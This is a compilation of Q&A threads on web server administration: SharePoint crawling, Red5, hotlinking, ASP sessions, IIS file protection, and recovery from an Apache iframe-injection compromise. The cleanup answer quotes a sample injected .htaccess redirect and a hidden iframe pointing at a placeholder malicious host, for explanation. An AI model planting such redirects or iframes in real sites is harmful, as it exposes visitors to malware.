SharePoint 2010 not searching content across files

Having made sure that all the proper indexing options are set, my dev install of SP2010 is still not searching the content of Word docs, only their titles. Any suggestions?

Does your crawler account have sufficient permission to access the file attached to the list item? Are you crawling your site as a SharePoint site or as a web site? (In the latter case, you need to make sure that you have links pointing to the documents.)
Do you have a robots.txt file at the root of your web application whose exclusion rules might prevent the content from being crawled properly?
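For reference, an exclusion rule of the kind that would block the crawler looks like the sketch below; the path is a hypothetical example, so check the actual file for anything covering your document libraries:

    User-agent: *
    Disallow: /Shared Documents/

Removing or narrowing such rules and then running a full crawl should let the document content be indexed.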
If you really want to know what's happening while the crawler is doing its job, you can install Fiddler on your dev machine and point the proxy settings of your Search service application at the proxy Fiddler creates. Doing so lets you watch in real time which URL/content is currently being crawled and the HTTP status codes being returned, to diagnose permission or content issues.
Hope it helped.

Related

How to bypass the Red5 demo page on startup?

At present, I start up Red5 at the Linux command line with ./red5.sh and it runs the script. Then I go to the http://localhost:5080 demos page to set up my camera and audio input, and everything works fine when testing the stream, both on the demo page and in the SWF on my webpage.
The question is: do I need to include some Java and/or ActionScript for the SWF player to bypass the Red5 demo page, so I can connect my input and stream directly in the code of the page? And so that only logged-in webpage viewers can connect?
Overall, I am wondering whether there is a way of hiding the server stream from anyone not logged in to view it on my site. I understand that somewhere in the webapps folder there is a hosts list of IPs, but it would be impossible to know the IPs of legitimate viewers as opposed to unwanted viewers or bandwidth stealers.
I am trying to set up a site for poetry readings, where readers can record live to my server and logged-in viewers can then watch from my website. I am trying to figure out whether I must keep that Red5 page open and whether doing so poses some kind of risk.
Found my own way of doing this just by removing and renaming files and folders.
If you go to /usr/local/red5/webapps, that is where all the directories served on the default port 5080 live. So I simply installed the applications I needed, then took everything out of there except the applications I wanted to run. I moved the rest into a folder in the /var directory, named red5_movedstuff, in case I want access to those applications later on. Then I renamed the applications I kept in the webapps folder (keeping the admin folder so I can still access them); importantly, after renaming an application's folder I also had to make the same name change in its WEB-INF.
Now if someone goes to myip:5080 they get a blank page, and by changing the names of the applications I have hidden my directories beyond that, including the list of streams.
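In shell terms, the procedure amounts to something like the following sketch; the application name myapp is hypothetical, and the exact set of bundled demo folders varies by Red5 version:

    cd /usr/local/red5/webapps
    mkdir -p /var/red5_movedstuff
    # Move the bundled demo applications out of webapps, keeping admin and your own apps
    mv root installer /var/red5_movedstuff/
    # Rename the application you keep, then update its WEB-INF configuration to match
    mv myapp myapp-renamed

Restart Red5 afterwards so it picks up the changed webapps directory.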

How to prevent bandwidth theft of my website, and why is my website's IP address sometimes dedicated and sometimes shared?

I think someone is stealing bandwidth from my website. To prevent this, I enabled hotlink protection. But there are only extensions related to images. How can I protect my other files, with extensions like .php or .asp? When I add the .php or .asp extensions, I am unable to access my own website.
Another thing: in my cPanel, the IP address of my website sometimes appears as dedicated and sometimes as shared. Why is this happening?
I found static.reverse.softlayer.com in my visitor list, but which web pages it visited is not displayed. Please help me.
You can only protect secondary material from hotlinking, for example images, JavaScript files, and CSS files. Because those are fetched from a page on your site, the server can determine whether they are being used correctly or not.
If you try to keep primary material (e.g. the actual web pages) from being hotlinked, you are actually keeping them from being fetched at all. Any resource that you want to be available directly can't be locked down that way.
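For the secondary material, a typical Apache .htaccess hotlink rule looks like the sketch below (replace example.com with your own domain; cPanel's hotlink-protection page generates something equivalent):

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} !^$
    RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.com/ [NC]
    RewriteRule \.(gif|jpe?g|png|css|js)$ - [F,NC]

It refuses requests for those file types whose Referer header points outside your site, while allowing an empty Referer so direct visits still work. As explained above, adding .php or .asp here locks out the pages themselves, which is why your site broke when you tried it.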

Classic ASP and SSL in a folder

We have a folder in a classic ASP site that has SSL set up for that folder. It works, but when you load the first page within the folder and then follow a hyperlink to another page in the folder, you get kicked back to the page outside the folder which led into the HTTPS stuff.
Repeat the process (follow a link on a non-HTTPS page > go to the HTTPS folder > follow a link to another page in the HTTPS folder) and it all works fine for a random number of hops between pages in the HTTPS folder; then, bang, you are kicked out again.
I have noticed that the session ID changes every time when hopping between pages in the HTTPS folder. Someone said it was due to IE compatibility mode swapping, but I have forced the mode with a header, and using the IE dev tools (miss you, Firebug) I can see that it stays constant. Any ideas, please?
We had a similar issue with another project last year. #padas is correct. Sessions on HTTP and HTTPS are different, and the server will have a problem with that. The option we went for was to serve the whole site over HTTPS. It makes sense anyway and helps users gain confidence in what they are browsing.
It sounds like you're moving between HTTP and HTTPS, and that will change the session ID. If your pages use session IDs to track people, you will have issues. You are better off dropping a cookie or forcing HTTPS.
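Forcing HTTPS in classic ASP can be as simple as an include at the top of every page; a minimal sketch (it ignores query strings for brevity):

    <%
    ' Redirect any plain-HTTP request to its HTTPS equivalent
    If LCase(Request.ServerVariables("HTTPS")) = "off" Then
        Response.Redirect "https://" & Request.ServerVariables("HTTP_HOST") & _
                          Request.ServerVariables("URL")
    End If
    %>

Once every page is on HTTPS, the browser presents a single consistent session cookie, so the ASP session ID stops changing as users cross the HTTP/HTTPS boundary.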

Preventing direct access to files in IIS 7

I have a PHP application running on a Microsoft IIS 7 server. The application shows PDF files in an iframe; the files contain users' sensitive data, and I would not like them to be directly accessible to anyone who knows the file address.
So basically, I'm looking for a way to protect the files from direct browser access or download, but still be able to show them in the application's iframe.
I did some research into rewrite rules, but since the "HTTP_REFERER" of an iframe is empty, I couldn't find a good solution.
Any suggestions for this?
Thanks in advance
Without seeing any of your code, or how your application works, I can only give suggestions based on how I think your app works.
Rather than showing the files themselves, with links directly to those files, you should consider changing your application so that the PHP reads in the directory, displays the file names (however you want them to appear), with links that go to a download.php page. The download page (after checking whether the user has permission to download the file) then loads the file into memory and serves it out as a response (with appropriate Content-Disposition and Content-Type headers).
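A minimal sketch of such a download.php (assuming PHP 5.4+ for http_response_code(); the login check, the id-to-path map, and the paths themselves are hypothetical placeholders to adapt to your application):

    <?php
    // download.php?id=... serves a PDF only to authorised users.
    session_start();
    if (!isset($_SESSION['user_id'])) {   // hypothetical login check
        http_response_code(403);
        exit('Forbidden');
    }
    // Map of ids to files kept outside the web root (hypothetical paths).
    $files = array('report1' => 'C:\\data\\pdfs\\report1.pdf');
    $id = isset($_GET['id']) ? $_GET['id'] : '';
    if (!isset($files[$id])) {
        http_response_code(404);
        exit('Not found');
    }
    header('Content-Type: application/pdf');
    header('Content-Disposition: inline; filename="' . basename($files[$id]) . '"');
    readfile($files[$id]);

The iframe then points at download.php?id=report1 instead of at the PDF itself, so the file on disk never needs to be web-addressable.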
Since your PHP application can read files directly within the web directory, you can set up rewrite rules to prevent those files from being accessed over the web; that way, the files can only be reached through the PHP application, which reads straight from the disk and so is not affected by the rewrite rules.
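If the PDFs must stay inside the web directory, an IIS URL Rewrite rule in web.config can refuse direct requests; a hedged sketch assuming the files sit under a protected/ folder (requires the URL Rewrite module):

    <system.webServer>
      <rewrite>
        <rules>
          <rule name="BlockDirectPdfAccess" stopProcessing="true">
            <match url="^protected/.*\.pdf$" />
            <action type="CustomResponse" statusCode="403"
                    statusReason="Forbidden" statusDescription="Direct access denied" />
          </rule>
        </rules>
      </rewrite>
    </system.webServer>

PHP's readfile() is unaffected by the rule because it reads from the file system rather than over HTTP.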
This is how sites like SourceForge can display an advertisement with a countdown saying your file download will begin in 5 seconds.

Apache attack on compromised server, iframe injected by string replace

My server has been compromised recently. This morning, I discovered that the intruder is injecting an iframe into each of my HTML pages. After testing, I found that the way he does it is by getting Apache (?) to replace every instance of
</body>
by
<iframe link to malware></iframe></body>
For example, if I browse a file residing on the server consisting of:
</body>
</body>
Then my browser sees a file consisting of:
<iframe link to malware></iframe></body>
<iframe link to malware></iframe></body>
I immediately stopped Apache to protect my visitors, but so far I have not been able to find what the intruder changed on the server to perform the attack. I presume he modified an Apache config file, but I have no idea which one. In particular, I looked for recently modified files by timestamp, but did not find anything noteworthy.
Thanks for any help.
Tuan.
PS: I am in the process of rebuilding a new server from scratch, but in the meantime I would like to keep the old one running, since this is a business site.
I don't know the details of your compromised server. This is a fairly standard drive-by attack against Apache, which you would ideally resolve by rolling back to a previous version of your web content and server configuration (if you have a colo, contact the technical team responsible for your backups). Let's presume, though, that you're entirely on your own and need to fix the problem yourself.
Pulling from StopBadware.org's documentation on the most common drive-by scenarios and resolution cases:
Malicious scripts
Malicious scripts are often used to redirect site visitors to a different website and/or load badware from another source. These scripts will often be injected by an attacker into the content of your web pages, or sometimes into other files on your server, such as images and PDFs. Sometimes, instead of injecting the entire script into your web pages, the attacker will only inject a pointer to a .js or other file that the attacker saves in a directory on your web server.
Many malicious scripts use obfuscation to make them more difficult for anti-virus scanners to detect, and some use names that look like they're coming from legitimate sites, for example a script URL that subtly misspells "analytics" to pass for Google Analytics.
.htaccess redirects
The Apache web server, which is used by many hosting providers, uses a hidden server file called .htaccess to configure certain access settings for directories on the website. Attackers will sometimes modify an existing .htaccess file on your web server, or upload new .htaccess files containing instructions to redirect users to other websites, often ones that lead to badware downloads or fraudulent product sales.
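An injected .htaccess of this kind often looks something like the following illustrative sketch (the domain is a placeholder); it redirects only visitors arriving from search engines, so the site owner browsing directly never sees it:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} (google|yahoo|bing)\. [NC]
    RewriteRule .* http://malicious-example.com/ [R=301,L]

Search your document roots for .htaccess files you did not create, and diff the ones you did.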
Hidden iframes
An iframe is a section of a web page that loads content from another page or site. Attackers will often inject malicious iframes into a web page or other file on your server. Often these iframes are configured so that they don't show up on the web page when someone visits it, but the malicious content they load still loads, hidden from the visitor's view.
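A hidden injected iframe typically looks like this (placeholder URL); the tiny size and hidden style keep it invisible while the browser still fetches the malicious page:

    <iframe src="http://malicious-example.com/exploit" width="1" height="1" frameborder="0" style="visibility:hidden"></iframe>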
How to look for it
If your site was reported as a badware site by Google, you can use Google's Webmaster Tools to get more information about what was detected. This includes a sampling of pages on which the badware was detected and, using a Labs feature, possibly even a sample of the bad code that was found on your site. Certain information can also be found on the Google Diagnostics page, which you reach by replacing example.com in the following URL with your own site's URL:
www.google.com/safebrowsing/diagnostic?site=example.com
There are several free and paid website-scanning services on the Internet that can help you zero in on specific badware on your site. There are also tools that you can use on your web server and/or on a downloaded copy of your website's files to search for specific text. StopBadware does not list or recommend such services, but the volunteers in our online community will be glad to point you to their favorites.
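Since you know the injected string, a direct search of the document root and the Apache configuration is a quick first pass; a hedged sketch, with placeholder paths to adjust to your layout:

    # Search web content and Apache config for the injected iframe
    grep -rn "iframe" /var/www /etc/apache2
    # List files changed in the last 7 days
    find /var/www /etc/apache2 -type f -mtime -7 -ls

Also compare the modules Apache actually loads (apachectl -M) against what you expect: content injected at serve time by a rogue module would explain why no page file on disk appears modified.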
In short, use the standard tools and scanners provided by Google first. If the threat can't be identified that way, you'll need to work back through the code of your CMS, your Apache configuration, your SQL setup, and the remaining content of your website to determine where you were compromised and what the right remediation steps should be.
Best of luck handling your issue!